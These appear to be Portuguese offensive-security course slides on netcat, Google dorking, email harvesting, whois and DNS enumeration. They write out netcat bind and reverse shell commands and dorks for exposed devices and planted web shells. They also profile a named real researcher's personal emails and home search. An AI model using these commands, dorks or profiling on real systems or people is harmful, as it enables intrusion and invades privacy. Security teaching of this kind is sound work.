SlideShare ist ein Scribd-Unternehmen logo

2 netcat enum-pub

Cassio Ramos
Cassio Ramos
1 von 28
Downloaden Sie, um offline zu lesen
Laboratório do Curso de Segurança Ofensiva Netcat e Enumeração (Google Hacking, Whois e DNS) 1. NETCAT a) Ajuda root@bt:~/lab_bash-script# nc -h [v1.10-38] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port] options: -c shell commands as `-e'; use /bin/sh to exec [dangerous!!] -e filename program to exec after connect [dangerous!!] -b allow broadcasts -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -k set keepalive option on socket -l listen mode, for inbound connects -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -q secs quit after EOF on stdin and delay of secs -s addr local source address -T tos set Type Of Service -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: lo-hi [inclusive]; hyphens in port names must be backslash escaped (e.g. 'ftp-data'). root@bt:~/lab_bash-script# Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 1
b) Banner grabbing Verificando portas abertas e lendo banners root@bt:~/lab_bash-script# nc -nv 172.16.49.100 21 (UNKNOWN) [172.16.49.100] 21 (ftp) open 220 (vsFTPd 2.3.0) root@bt:~/lab_bash-script# nc -nv 172.16.49.100 80 (UNKNOWN) [172.16.49.100] 80 (www) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Wed, 20 Jun 2012 22:01:42 GMT Server: Apache/2.2.16 (Ubuntu) Last-Modified: Wed, 20 Jun 2012 21:57:24 GMT ETag: "c5af2-b1-4c2ee7bee7e05" Accept-Ranges: bytes Content-Length: 177 Vary: Accept-Encoding Connection: close Content-Type: text/html c) CHATT Simples No Backtrack nc -lvp 4444 Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 2
No Windows XP-SP2 nc -nv 172.16.49.130 4444 Basta digitar qualquer coisa em qualquer uma das máquinas d) Administração Remota - BIND SHEL No BT localizado na rede externa root@bt:~# nc -lvp 4444 -e /bin/bash listening on [any] 4444 ... No maquina windows XP-SP2 na rede interna C:>nc -nv 172.16.49.130 4444 (UNKNOWN) [172.16.49.130] 4444 (?) open ls Desktop lab_bash-script rota.sh Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 3
- REVERSE SHELL – NC No BT localizado na rede externa root@bt:~# nc -lvp 4444 listening on [any] 4444 ... Na máquina windows XP-SP2 na rede interna C:>nc -nv 172.16.49.130 4444 -e cmd.exe (UNKNOWN) [172.16.49.130] 4444 (?) open Resultado no BT root@bt:~# nc -lvp 4444 listening on [any] 4444 ... 172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1214 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:>hostname hostname CTP028 C:> e) Port Scan BT externo scaneando o Firewall (portas 21 a 30) root@bt:~# nc -z -nvv -w 1 172.16.49.100 21-30 (UNKNOWN) [172.16.49.100] 30 (?) : Connection refused (UNKNOWN) [172.16.49.100] 29 (?) : Connection refused (UNKNOWN) [172.16.49.100] 28 (?) : Connection refused (UNKNOWN) [172.16.49.100] 27 (?) : Connection refused (UNKNOWN) [172.16.49.100] 26 (?) : Connection refused (UNKNOWN) [172.16.49.100] 25 (smtp) : Connection refused (UNKNOWN) [172.16.49.100] 24 (?) : Connection refused (UNKNOWN) [172.16.49.100] 23 (telnet) : Connection refused (UNKNOWN) [172.16.49.100] 22 (ssh) open (UNKNOWN) [172.16.49.100] 21 (ftp) open Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 4
f) Transferência de Arquivos BT externo scaneando o Firewall (portas 21 a 30) root@bt:~# nc -lvp 4444 > output.txt listening on [any] 4444 ... 172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1224 No windows XP-SP2 na rede interna C:>nc.exe -nv 172.16.49.130 4444 < arq1.txt (UNKNOWN) [172.16.49.130] 4444 (?) open Resultado root@bt:~# ls Desktop lab_bash-script output.txt rota.sh root@bt:~# more output.txt teste de transferencia root@bt:~# Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 5
2. Google Search google search operators - verificar site operator e outros site:offensive-security.com - ver quantas pag web tem o domínio - paginas indexadas Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 6
site www.offensive-security.com filetype:pdf (só PDF) site:aeoi.org.ir (21.800 pages) Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 7
intitle:"Remote Desktop Web Connection" inurl:tsweb Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 8
google hacking database -- ghdb google hacking database site com webmin rodando inurl:10000 webmin Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 9
site com vnc server rodando intitle:"VNC viewer for java" --- servidores VNC http://okbk.myvnc.com:5800/ Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 10
servidor de impressão intitle:"Network Print Server" filetype:shtm interface web roteador speed stream intitle:"SpeedStream Router Management Interface" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 11
intitle:"Setup Home" "You will need * log in before * * change * settings" (belkin) Camera de Seguranca inurl:"viewerframe?mode=motion" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 12
inurl:"ViewerFrame?Mode=" inurl:"view/index.shtml" "please visit" intitle:"i-Catcher Console" Copyright "iCode" intitle:"everfocus edsr applet" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 13
Software de videoconf intext:"Videoconference Management System" ext:htm phpmyadmin aberto intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 14
Norton AV for gateways inurl:"8003/Display?what=" contatos MSN filetype:ctt "msn" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 15
Kickstart #kickstart filetype:cfg #kickstart filetype:cfg site:gov.br CUIDADO!!!!!! backdoor apache intitle:r57 shell filetype:php Site com backdoor plantado - antichat no title intitle:"Antichat Shell" "disable functions" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 16
3. Google Search Social aeoi.org.ir puro no google - ver emails utilizar theharvester.py (script em python no BT) root@bt:~# cd /pentest/enumeration/theharvester/ root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d aeoi.org.ir -l 500 -b google [-] Searching in Google: Searching 0 results... Searching 100 results... Searching 200 results... [+] Emails found: -----------------hkazemian@aeoi.org.ir sjahmadi@aeoi.org.ir smshirvani@aeoi.org.ir mmostaedi@aeoi.org.ir AA37120067@aeoi.org.ir jrahighi@aeoi.org.ir sabolhosseini@aeoi.org.ir mghannadi@aeoi.org.ir rd@aeoi.org.ir Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 17
usar hkazemian@aeoi.org.ir é um pesquisador, tem email yahoo usar hkazemian@yahoo.com Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 18
ver SPAG Zeolite end da empress tel de contato e outro email do gmail - procurar foto usar hosseinkazemian@gmail.com - procurando apto veja telefone Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 19
Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 20
4. Whois Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 21
Consulta whois root@bt:~# whois checkpoint.com | more Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Server Name: CHECKPOINT.COM IP Address: 216.200.241.66 Registrar: NETWORK SOLUTIONS, LLC. Whois Server: whois.networksolutions.com Referral URL: http://www.networksolutions.com/en_US/ Domain Name: CHECKPOINT.COM Registrar: NETWORK SOLUTIONS, LLC. Whois Server: whois.networksolutions.com Referral URL: http://www.networksolutions.com/en_US/ Name Server: NS2.CHECKPOINT.COM Name Server: NS6.CHECKPOINT.COM Name Server: NS8.CHECKPOINT.COM Name Server: NS9.CHECKPOINT.COM Status: clientTransferProhibited Updated Date: 30-may-2012 Creation Date: 29-mar-1994 Expiration Date: 30-mar-2018 Administrative Contact, Technical Contact: Admin, DNS hostmaster@CHECKPOINT.COM Check Point Software Technologies Ltd. 3A Jabotinsky St. Ramat-Gan, 52520 IL +972-3-7534555 fax: +972-3-5759256 Record expires on 30-Mar-2018. Record created on 29-Mar-1994. Database last updated on 20-Jun-2012 22:30:44 EDT. Domain servers in listed order: NS2.CHECKPOINT.COM NS6.CHECKPOINT.COM NS8.CHECKPOINT.COM NS9.CHECKPOINT.COM 206.184.151.195 194.29.32.199 216.228.148.29 194.29.38.64 Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 22
Consulta Reversa whois root@bt:~# whois 216.200.241.66 # # Query terms are ambiguous. The query is assumed to be: # "n 216.200.241.66" # # Use "?" to get help. # # # The following results may also be obtained via: # http://whois.arin.net/rest/nets;q=216.200.241.66?showDetails=true&showARIN=false&ext= netref2 # CHECKPOINT SOFTWARE MFN-B655-216-200-241-64-28 (NET-216-200-241-64-1) 216.200.241.64 - 216.200.241.79 Abovenet Communications, Inc ABOVENET-5 (NET-216-200-0-0-1) 216.200.0.0 216.200.255.255 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 23
5. DNS Consultas Manuais root@bt:~# nslookup www.checkpoint.com Server: 172.16.49.2 Address: 172.16.49.2#53 Non-authoritative answer: Name: www.checkpoint.com Address: 216.200.241.66 Consulta de Servidor de Email e de Nomes do domínio root@bt:~# nslookup > set type=mx > checkpoint.com Server: 172.16.49.2 Address: 172.16.49.2#53 Non-authoritative answer: checkpoint.com mail exchanger = 12 sami.checkpoint.com. checkpoint.com mail exchanger = 15 usmail-as.zonelabs.com. Authoritative answers can be found from: > set type=ns > checkpoint.com Server: 172.16.49.2 Address: 172.16.49.2#53 Non-authoritative answer: checkpoint.com nameserver = ns2.checkpoint.com. checkpoint.com nameserver = ns6.checkpoint.com. checkpoint.com nameserver = ns8.checkpoint.com. checkpoint.com nameserver = ns9.checkpoint.com. checkpoint.com nameserver = ns1.checkpoint.com. Authoritative answers can be found from: > Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 24
- DNS Information Gathering 1- forward lookup BF - tentar acertar nomes validos root@bt:~/lab_DNS# host www.checkpoint.com www.checkpoint.com has address 216.200.241.66 www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10 root@bt:~/lab_DNS# host wwwwwwww.checkpoint.com Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN) root@bt:~/lab_DNS# - usar script1.sh no BT para FB (sem manipulação) root@bt:~/lab_DNS# more script_dns1.sh #!/bin/bash for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do host $name.checkpoint.com done - usar script2.sh no BT para FB ("has address") root@bt:~/lab_DNS# more script_dns2.sh #!/bin/bash for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do host $name.checkpoint.com | grep "has address" done root@bt:~/lab_DNS# ./script_dns2.sh forums.checkpoint.com has address 194.29.38.13 ftp.checkpoint.com has address 194.29.38.25 ftps.checkpoint.com has address 194.29.38.27 mailhost.checkpoint.com has address 194.29.32.199 cale.checkpoint.com has address 194.29.32.199 mx1.checkpoint.com has address 194.29.38.66 ns.checkpoint.com has address 194.29.32.199 ns1.checkpoint.com has address 208.185.174.140 ns2.checkpoint.com has address 208.185.174.141 register.checkpoint.com has address 194.29.38.35 search.us.checkpoint.com has address 209.87.209.207 smtp.checkpoint.com has address 194.29.34.68 www.checkpoint.com has address 216.200.241.66 www.checkpoint.com has address 216.200.241.66 root@bt:~/lab_DNS# Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 25
- usar script3.sh no BT para FB (só IPs) root@bt:~/lab_DNS# more script_dns3.sh #!/bin/bash for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do host $name.checkpoint.com | grep "has address" | cut -d" " -f4 done root@bt:~/lab_DNS# ./script_dns3.sh 194.29.38.13 194.29.38.25 194.29.38.27 194.29.32.199 194.29.32.199 194.29.38.66 194.29.32.199 208.185.174.140 208.185.174.141 194.29.38.35 209.87.209.207 194.29.34.68 216.200.241.66 216.200.241.66 2- reverse lookup BF - Tentar resolução Reversa root@bt:~/lab_DNS# host 216.200.241.66 66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com. root@bt:~/lab_DNS# for ip in $(seq 64 79); do host 216.200.241.$ip | grep "domain name pointer" ;done 64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net. 65.241.200.216.in-addr.arpa domain name pointer lata-gw.us.checkpoint.com. 66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com. 67.241.200.216.in-addr.arpa domain name pointer garmin.us.checkpoint.com. 68.241.200.216.in-addr.arpa domain name pointer flanger.us.checkpoint.com. 69.241.200.216.in-addr.arpa domain name pointer gould.us.checkpoint.com. 70.241.200.216.in-addr.arpa domain name pointer franklin.us.checkpoint.com. 71.241.200.216.in-addr.arpa domain name pointer darwin.us.checkpoint.com. 72.241.200.216.in-addr.arpa domain name pointer artemis.us.checkpoint.com. 73.241.200.216.in-addr.arpa domain name pointer amadeus.us.checkpoint.com. 74.241.200.216.in-addr.arpa domain name pointer streamer.us.checkpoint.com. 75.241.200.216.in-addr.arpa domain name pointer lata1.us.checkpoint.com. 76.241.200.216.in-addr.arpa domain name pointer lata2.us.checkpoint.com. 77.241.200.216.in-addr.arpa domain name pointer davis1.us.checkpoint.com. 78.241.200.216.in-addr.arpa domain name pointer davis2.us.checkpoint.com. 79.241.200.216.in-addr.arpa domain name pointer 216.200.241.79.available.above.net. Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 26
3- Zone transfer root@bt:~# host -t ns offensive-security.com offensive-security.com name server ns4.no-ip.com. offensive-security.com name server ns2.no-ip.com. offensive-security.com name server ns1.no-ip.com. offensive-security.com name server ns3.no-ip.com. offensive-security.com name server ns5.no-ip.com. root@bt:~# host -l offensive-security.com ns1.no-ip.com ; Transfer failed. Using domain server: Name: ns1.no-ip.com Address: 204.16.255.55#53 Aliases: Host offensive-security.com.localdomain not found: 9(NOTAUTH) ; Transfer failed. ------tentar com todos servidores de nomes - (primário e secundários) ------fazer com aeoi.org.ir e estacio.br Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 27
Usar /pentest/enumeration/dnsenum root@bt:/pentest/enumeration/dns/dnsenum# ls dns-big.txt dnsenum.pl dns.txt README.txt root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl estacio.br estacio.br 5 IN A 200.216.152.71 Name Servers: ns1.estacio.br ns2.estacio.br 5 5 IN A IN A 200.216.152.249 200.216.152.250 Mail (MX) Servers: Mail.Global.FrontBridge.com 5 IN A 216.32.180.22 Mail.Global.FrontBridge.com 5 IN A 216.32.181.178 estacio.br 1800 IN TXT estacio.br 1800 IN A 200.216.152.71 1989163337.estacio.br 1800 IN CNAME mail._domainkey.estacio.br 14400 IN TXT agenda.estacio.br 1800 IN A 200.216.152.71 agendaconselho.estacio.br 1800 IN A 200.216.152.71 aluno.estacio.br 1800 IN MX biblioteca.estacio.br 1800 IN CNAME bibliotecasonora.estacio.br 1800 IN A 200.216.152.90 blogdopresidente.estacio.br 1800 IN A 200.216.152.149 bquestoes.estacio.br 1800 IN A 200.216.152.63 adm.bquestoes.estacio.br 1800 IN A 200.216.152.62 provas.bquestoes.estacio.br 1800 IN A 200.216.152.63 Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 28

Empfohlen

3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pub3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pubCassio Ramos
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modemCyber Security Alliance
 
True stories on the analysis of network activity using Python
True stories on the analysis of network activity using PythonTrue stories on the analysis of network activity using Python
True stories on the analysis of network activity using Pythondelimitry
 
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Андрей Шорин
 
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Ontico
 
Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Andriy Berestovskyy
 
The Spectre of Meltdowns
The Spectre of MeltdownsThe Spectre of Meltdowns
The Spectre of MeltdownsAndriy Berestovskyy
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 

Empfohlen

3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pub3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pubCassio Ramos
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modemCyber Security Alliance
 
True stories on the analysis of network activity using Python
True stories on the analysis of network activity using PythonTrue stories on the analysis of network activity using Python
True stories on the analysis of network activity using Pythondelimitry
 
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Андрей Шорин
 
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Ontico
 
Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Andriy Berestovskyy
 
The Spectre of Meltdowns
The Spectre of MeltdownsThe Spectre of Meltdowns
The Spectre of MeltdownsAndriy Berestovskyy
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)SSASIT
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 MarsRémi Dubois
 
Nmap tutorial
Nmap tutorialNmap tutorial
Nmap tutorialVarun Kakumani
 
Network commands
Network commandsNetwork commands
Network commandsDr. Mahadev Gawas
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
 
Nmap scripting engine
Nmap scripting engineNmap scripting engine
Nmap scripting enginen|u - The Open Security Community
 
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochKernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochAnne Nicolas
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawRedspin, Inc.
 
The Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerThe Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerSasha Goldshtein
 
DMVPN
DMVPNDMVPN
DMVPNNetProtocol Xpert
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...sonjeku1
 
Tomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSTomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSDefconRussia
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking GuideAryan G
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanningamiable_indian
 
20141106 asfws unicode_hacks
20141106 asfws unicode_hacks20141106 asfws unicode_hacks
20141106 asfws unicode_hacksCyber Security Alliance
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commandsSayed Ahmed
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdffaker1842002
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...Felipe Prado
 
Linux networking
Linux networkingLinux networking
Linux networkingArie Bregman
 

Weitere ähnliche Inhalte

Was ist angesagt?

Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)SSASIT
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 MarsRémi Dubois
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
 
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochKernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochAnne Nicolas
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawRedspin, Inc.
 
The Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerThe Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerSasha Goldshtein
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...sonjeku1
 
Tomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSTomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSDefconRussia
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking GuideAryan G
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commandsSayed Ahmed
 

Was ist angesagt? (19)

Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 Mars
 
Nmap tutorial
Nmap tutorialNmap tutorial
Nmap tutorial
 
Network commands
Network commandsNetwork commands
Network commands
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
 
Nmap scripting engine
Nmap scripting engineNmap scripting engine
Nmap scripting engine
 
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochKernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
